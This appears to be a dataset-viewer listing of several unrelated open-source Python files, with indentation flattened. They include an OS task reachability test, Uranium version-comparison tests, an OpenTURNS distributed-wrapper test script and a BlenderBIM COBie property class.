(Handler11, Handler12, Handler13, Idle, StartOS) = \
get_functions(analysis.system_graph, ["Handler11", "Handler12", "Handler13", "Idle", "StartOS"])
t = RunningTaskToolbox(analysis)
# Handler11 has higher priority than Handler12
t.reachability(StartOS, "StartOS", [], # =>
[Handler11])
# Handler11 has higher priority than Handler12
t.reachability(Handler11, "ActivateTask", [Handler12], # =>
[Handler11])
# Handler13 is directly started
t.reachability(Handler11, "ActivateTask", [Handler13], # =>
[Handler13])
# Handler12 is always activated afterwards
t.reachability(Handler13, "TerminateTask", [], # =>
[Handler11])
# Handler12 is always activated afterwards
t.reachability(Handler11, "TerminateTask", [], # =>
[Handler12])
# Handler12 is always activated afterwards
t.reachability(Handler12, "TerminateTask", [], # =>
[Idle])
# Idle handler is never left
t.reachability(Idle, "Idle", [], # =>
[Idle])
t.promise_all_syscalls_checked()
|
Ultimaker/Uranium
|
tests/TestVersion.py
|
# Copyright (c) 2018 Ultimaker B.V.
# Uranium is released under the terms of the LGPLv3 or higher.
from UM.Version import Version
from unittest import TestCase
import pytest
major_versions = [Version("1"), Version(b"1"), Version(1), Version([1]), Version(["1"]), Version("1."), Version("MOD-1"), Version("1B"), Version(Version("1"))]
major_minor_versions = [Version("1.2"), Version("1-2"), Version("1_2"), Version(b"1.2"), Version("1.2BETA"), Version([1, 2]), Version(["1", "2"]), Version([1, "2"]), Version([1, b"2"])]
major_minor_revision_versions = [Version("1.2.3"), Version("1.2.3BETA"), Version("1_2-3"), Version(b"1.2.3"), Version([1, 2, 3]), Version(["1", "2", "3"]), Version([1, "2", 3]), Version("MOD-1.2.3"), Version(["1", 2, b"3"])]
def check_version_equals(first_version: Version, second_version: Version):
assert first_version == second_version
assert first_version.getMajor() == second_version.getMajor()
assert first_version.getMinor() == second_version.getMinor()
assert first_version.getRevision() == second_version.getRevision()
@pytest.mark.parametrize("first_version", major_versions)
@pytest.mark.parametrize("second_version", major_versions)
def test_major_equals(first_version, second_version):
check_version_equals(first_version, second_version)
@pytest.mark.parametrize("first_version", major_minor_versions)
@pytest.mark.parametrize("second_version", major_minor_versions)
def test_major_and_minor_equals(first_version, second_version):
check_version_equals(first_version, second_version)
@pytest.mark.parametrize("first_version", major_minor_revision_versions)
@pytest.mark.parametrize("second_version", major_minor_revision_versions)
def test_major_minor_revision_equals(first_version, second_version):
check_version_equals(first_version, second_version)
@pytest.mark.parametrize("first_version", major_versions)
@pytest.mark.parametrize("second_version", major_minor_versions)
def test_check_version_smaller(first_version, second_version):
assert first_version < second_version
# Just to be on the really safe side
assert first_version != second_version
assert not first_version > second_version
@pytest.mark.parametrize("first_version", major_minor_versions)
@pytest.mark.parametrize("second_version", major_minor_revision_versions)
def test_check_version_smaller_2(first_version, second_version):
assert first_version < second_version
# Just to be on the really safe side
assert first_version != second_version
assert not first_version > second_version
def test_versionPostfix():
version = Version("1.2.3-alpha.4")
assert version.getPostfixType() == "alpha"
assert version.getPostfixVersion() == 4
assert version.hasPostFix()
assert not Version("").hasPostFix()
assert version <= Version("1.2.3-alpha.5")
assert version < Version("1.2.3-alpha.5")
def test_versionWeirdCompares():
version = Version("1.2.3-alpha.4")
assert not version == 12
def test_wrongType():
version = Version(None)
assert version == Version("0")
def test_compareStrings():
version_string = "1.0.0"
version = Version(version_string)
assert version == version_string
assert version >= version_string
assert version < "2.0.0"
assert version <= "2.0.0"
assert "0" < version
assert Version("1.0.0") > Version("1.0.0-alpha.7")
# Defend people from ignoring the typing.
assert not version > None
assert not version < None
def test_compareBeta():
normal_version = Version("1.0.0")
beta_version = Version("1.0.0-BETA")
assert normal_version > beta_version
def test_comparePostfixVersion():
assert Version("1.0.0-alpha.1") < Version("1.0.0-alpha.2")
|
dbarbier/privot
|
python/test/t_distributed_python_wrapper.py
|
#! /usr/bin/env python
# -*- coding: utf8 -*-
import openturns as ot
import sys
import shutil
import os
import argparse
import threading
import tempfile
# multicore example:
# ./t_distributed_python_wrapper.py --sample-size 10 --test local
#
# multihost example (need working ssh server):
# ./t_distributed_python_wrapper.py --sample-size 100 --test remote --hosts host1 host2
# todo: add ctrc-c test
parser = argparse.ArgumentParser(description="test openturns "
"distributed-python-wrapper",
add_help=False)
parser.add_argument('--help', action='store_const', const=[],
help='show this help message and exit')
parser.add_argument('--debug', '-d', action='store_true',
help='print openturns debug\'log')
parser.add_argument('--hosts', '-h', nargs='+')
parser.add_argument('--test', '-t', nargs=1,
help='test_type (remote, local)')
parser.add_argument('--point', action='store_true',
help='test with one point rather than a sample')
parser.add_argument('--analytical', action='store_true',
help='test without separate workdir')
parser.add_argument('--cleanup', '-c', nargs=1,
help='cleanup workdirs')
parser.add_argument('--error', '-e', action='store_true',
help='make error')
parser.add_argument('--tmpdir', '-w', nargs=1,
help='tmpdir')
parser.add_argument('--sample-size', '-s', nargs=1,
help='number of points to compute')
parser.add_argument('--work-time', '-p', nargs=1,
help='number of second of computing per point')
parser.add_argument('--nb-output', '-n', nargs=1,
help='number of output variable')
args = parser.parse_args()
#print "args: " + str(args)
# print help if asked
if args.help != None:
printHelp(parser)
if args.debug:
ot.Log.Show( ot.Log.Flags() | ot.Log.DBG )
hosts = None
if args.hosts != None:
hosts = args.hosts
test_type = "local"
if args.test != None:
test_type = args.test[0]
test_point = False
if args.point:
test_point = True
test_analytical = False
if args.analytical:
test_analytical = True
cleanup = "ok"
if args.cleanup != None:
cleanup = args.cleanup[0]
make_error = args.error
tmpdir = ""
if args.tmpdir != None:
tmpdir = args.tmpdir[0]
sample_size = 5
if args.sample_size != None:
sample_size = int(args.sample_size[0])
work_time = 1
if args.work_time != None:
work_time = float(args.work_time[0])
nb_output = 1
if args.nb_output != None:
nb_output = int(args.nb_output[0])
print( "test_type:" + test_type + ", test_point:" + str(test_point) + \
", test_analytical:" + str(test_analytical) + \
", cleanup:" + cleanup + ", make_error:" + \
str(make_error) + ", tmpdir:" + tmpdir + ", sample_size:" + \
str(sample_size) + ", work_time:" + str(work_time) + ", hosts:" + \
str(hosts) + ", nb_output:" + str(nb_output))
# uncomment following line to show wanted logs
#ot.Log.Show( ot.Log.ALL )
#
#ot.Log.Show( ot.Log.Flags() | ot.Log.WRAPPER )
#ot.Log.Show( ot.Log.Flags() | ot.Log.DBG )
# print compute progression :
ot.Log.Show( ot.Log.Flags() | ot.Log.INFO )
# set number of thread = number of job concurrently started
#ResourceMap.Set("parallel-threads", "6")
#print "Nb of thread of localhost: ", ot.ResourceMap.Get("parallel-threads")
script_dir = os.path.dirname( os.path.realpath( __file__ ) )
program_wrapper = script_dir + os.sep + "dummy_program_wrapper.py"
func_wrapper = script_dir + os.sep + "dummy_func_wrapper.py"
program = script_dir + os.sep + "dummy_program.py"
dist_func = ot.OpenTURNSDistributedPythonFunction(n_input=4,
n_output=nb_output,
wrapper_file=program_wrapper,
hosts=hosts,
cleanup=cleanup,
files_to_send=[program],
tmpdir=tmpdir)
if test_analytical:
dist_func.set_separate_workdir(False)
if 'win' not in sys.platform:
# change group pid in order to avoid wrapper_launcher destroying parent process
# when interrupting
os.setpgid(0, 0)
model = ot.NumericalMathFunction( dist_func )
# create sample
inS = ot.NumericalSample(sample_size, 4)
if not make_error:
F=2
else:
F=666
for i in range(sample_size):
inS[i,0] = i + 1
inS[i,1] = F
inS[i,2] = work_time
inS[i,3] = nb_output
print( 'Compute' )
if make_error:
try:
outS = model( inS )
except:
print( '====== An error raised, that\'s ok ======' )
else:
Exception("ERROR: no exception!")
else:
if not test_point:
outS = model( inS )
else:
outS = []
outS.append( model( inS[0] ) )
sample_size = 1
print( 'Results' )
if sample_size < 64 and nb_output <= 2:
print( outS )
# 01 comes from deterministic value, check output values are ok
sum = 0
ok = 1
for i in range(sample_size):
z = outS[i][0]
valid_value = (i + 1) * F
if z != valid_value:
ok = 0
print( 'point ' + str(i) + ' incorrect, got value: ' + str(z) + \
', valid value is ' + str(valid_value) )
if ok:
print( 'Results are OK.' )
else:
print ('!!!!!!!!!!!!!!!ERROR!!!!!!!!!!!!!!!!!' )
exit(1)
# check existing or not workdir
check_workdir_beg = None
check_workdir_end = None
# guess workdir
workdir = dist_func.wd_hosts_in.remote_tmpdir
if not workdir:
workdir = tempfile.gettempdir()
workdir += os.sep + dist_func.wd_hosts_in.workdir_basename
if cleanup == "no":
check_workdir_beg = 0
check_workdir_end = sample_size
elif cleanup == "ok" and sample_size > 2 and make_error:
check_workdir_beg = 2
check_workdir_end = 2
if check_workdir_beg != None:
# todo: check that 0..n directory are there on remote nodes too?
if test_type == "local":
workdirs = range(check_workdir_beg, check_workdir_end)
dirs = os.listdir(workdir)
for i in workdirs:
if str(i) not in dirs:
err_msg = "The directory " + workdir + os.sep +\
str(i) + " was not found!"
print (err_msg)
raise Exception(err_msg)
shutil.rmtree(workdir)
print( 'Workdir found. Cleaned.' )
else:
if os.path.exists(workdir):
raise Exception('The workdir was not cleaned!')
print( 'Workdir not found: ok.' )
# print an empty line in order to detect exception
print ('')
|
IfcOpenShell/IfcOpenShell
|
src/blenderbim/blenderbim/bim/module/cobie/prop.py
|
# BlenderBIM Add-on - OpenBIM Blender Add-on
# Copyright (C) 2020, 2021 Dion Moult <dion@thinkmoult.com>
#
# This file is part of BlenderBIM Add-on.
#
# BlenderBIM Add-on is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# BlenderBIM Add-on is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with BlenderBIM Add-on. If not, see <http://www.gnu.org/licenses/>.
import bpy
from bpy.types import PropertyGroup
from bpy.props import (
PointerProperty,
StringProperty,
EnumProperty,
BoolProperty,
IntProperty,
FloatProperty,
FloatVectorProperty,
CollectionProperty,
)
class COBieProperties(PropertyGroup):
cobie_ifc_file: StringProperty(default="", name="COBie IFC File")
cobie_types: StringProperty(default=".COBieType", name="COBie Types")
cobie_components: StringProperty(default=".COBie", name="COBie Components")
cobie_json_file: StringProperty(default="", name="COBie JSON File")
should_load_from_memory: BoolProperty(default=False, name="Load from Memory")
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.